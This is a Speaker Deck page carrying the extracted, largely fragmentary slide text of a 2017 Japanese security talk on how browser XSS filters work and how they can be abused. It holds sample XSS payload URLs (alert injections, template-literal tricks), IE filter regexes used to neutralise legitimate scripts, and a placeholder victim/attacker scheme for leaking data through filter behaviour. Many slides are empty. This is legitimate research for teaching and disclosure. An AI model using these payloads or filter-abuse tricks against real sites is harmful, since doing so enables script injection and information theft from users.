$30 off During Our Annual Pro Sale. View Details »

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Masato Kinugawa
March 31, 2017
Technology
7
2.8k

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Masato Kinugawa

March 31, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
14k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
0
10k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.2k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
87k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
21k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.8k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
25k

Other Decks in Technology

See All in Technology
AI・機械学習ライブラリを使ったWebアプリでワクワク体験! / Qiita Night~AI、機械学習 / 20231201
you
PRO
0
690
kintone テクニカルライター採用ピッチ資料
cybozuinsideout
PRO
0
710
visionOSについてGlobeeが取り組んでいること
toshi0383
0
230
ソフトウェアの内部品質に生じる様々な問題は組織設計にその原因があることも多い / Internal Quality Issues Caused by Organizational Design
mtx2s
109
44k
ChatGPT for Developer - 超入門
dahatake
41
22k
開発組織の体制づくり、いつやるか問題
akiroom
0
1.4k
ミチビク株式会社エンジニアカンパニーデック
knsg16
0
2.2k
⾃律的な開発チームを⽀えるためのSLO運⽤
sansantech
PRO
5
860
なぜ
リアーキテクティング専任チームを作ったのか
kei_s
PRO
2
1k
CSSパフォーマンスに関する計測結果
poteboy
3
1.1k
Azure OpenAI Serviceの採用と挑戦 - Azure AI Hub meetup #1
cimadai
1
210
Kotlin製のGraphQLサーバーをNode.jsでモジュラモノリス化している話
hokaccha
1
2.1k

Featured

See All Featured
Atom: Resistance is Futile
akmur
257
24k
Code Review Best Practice
trishagee
53
14k
Raft: Consensus for Rubyists
vanstee
130
6k
The Invisible Customer
myddelton
113
12k
KATA
mclloyd
13
11k
The Illustrated Children's Guide to Kubernetes
chrisshort
26
45k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
0
270
Typedesign – Prime Four
hannesfritz
35
1.8k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
101
6.4k
The Mythical Team-Month
searls
214
41k
VelocityConf: Rendering Performance Case Studies
addyosmani
319
23k
Intergalactic Javascript Robots from Outer Space
tanoku
264
26k

Transcript

  1. View Slide

  2. View Slide





  3. View Slide

  4. View Slide

  5. https://example.com/?q=">


    ">



    View Slide

  6. https://example.com/?q=">


    ">



    View Slide

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

    View Slide

  8. HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  9. View Slide

  10. View Slide

  11. View Slide

  12. https://example.com/?q=">
    https://example.com/#5382863726995448701


    ">
    ">

    View Slide

  13. View Slide

  14. ">


    https://example.com/?q=">

    View Slide

  15. ">


    https://example.com/?q=">

    View Slide

  16. https://example.com/?q=">
    https://example.com/#5382863726995448701


    View Slide

  17. <script> - Google 検索
    (function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>

    View Slide


  18. <br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>
    https://example.com/?

    View Slide

  19. View Slide

  20. {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
    *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
    |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
    );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
    (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
    A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
    b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    ">

    View Slide

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">

    View Slide

  22. ">
    [\"\'][ ]*(([^a-z0-
    9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
    )).+?{\(}.*?{\)}
    x="";alert(1)//"

    View Slide

  23. View Slide

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
    2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

    View Slide

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

    View Slide

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/>q = "";document#body.innerHTML="<xss>";<br/>
    URL: ?q=";document.body.innerHTML="

    View Slide

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>
    URL: ?"/++.+++=

    View Slide

  28. "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:

    View Slide

  29. type="text/javascript">

    View Slide

  30. window#name//Syntax Error
    window^name//Syntax OK
    window.name<br/>

    View Slide

  31. View Slide

  32. url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }

    View Slide

  33. https://example.com/?q=";alert`1`//

    <br/>q = "";alert`1`//";<br/>
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else

    View Slide

  34. https://example.com/?q=${alert(1)}``//&`+++`

    https://example.com/?q=[USER_INPUT]

    <br/>foo=``;<br/>q="[USER_INPUT]";<br/>
    <br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>

    View Slide

  35. https://example.com/?+onfiles+++=.

    type="text/javascript">

    [...]

    View Slide

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

    View Slide

  37. View Slide

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

    View Slide

  39. https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win=window.open(…) if(win.length == 0){
    //
    //
    }else{
    //
    }

    View Slide






  40. View Slide

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

    View Slide

  42. HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  43. https://accounts.google.com/ServiceLogin?

    View Slide

  44. google.ae
    google.as
    google.ca
    google.co
    google.co.in
    google.co.jp
    google.co.kr
    google.co.nz
    google.co.uk
    google.com.br
    google.com.mx
    google.de
    google.es
    google.fr
    google.it
    google.pl
    google.pt
    google.ru
    ...(

    View Slide




  45. View Slide

  46. {

    View Slide

  47. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/

    View Slide

  48. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  49. 0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  50. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  51. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z

    View Slide

  52. [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

    View Slide





  53. View Slide

  54. [email protected]

    View Slide

  55. https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=

    View Slide

  56. https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=

    View Slide

  57. https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...

    View Slide




  58. View Slide

  59. View Slide

  60. View Slide

  61. View Slide

  62. View Slide




  63. View Slide






  64. View Slide







  65. View Slide

  66. View Slide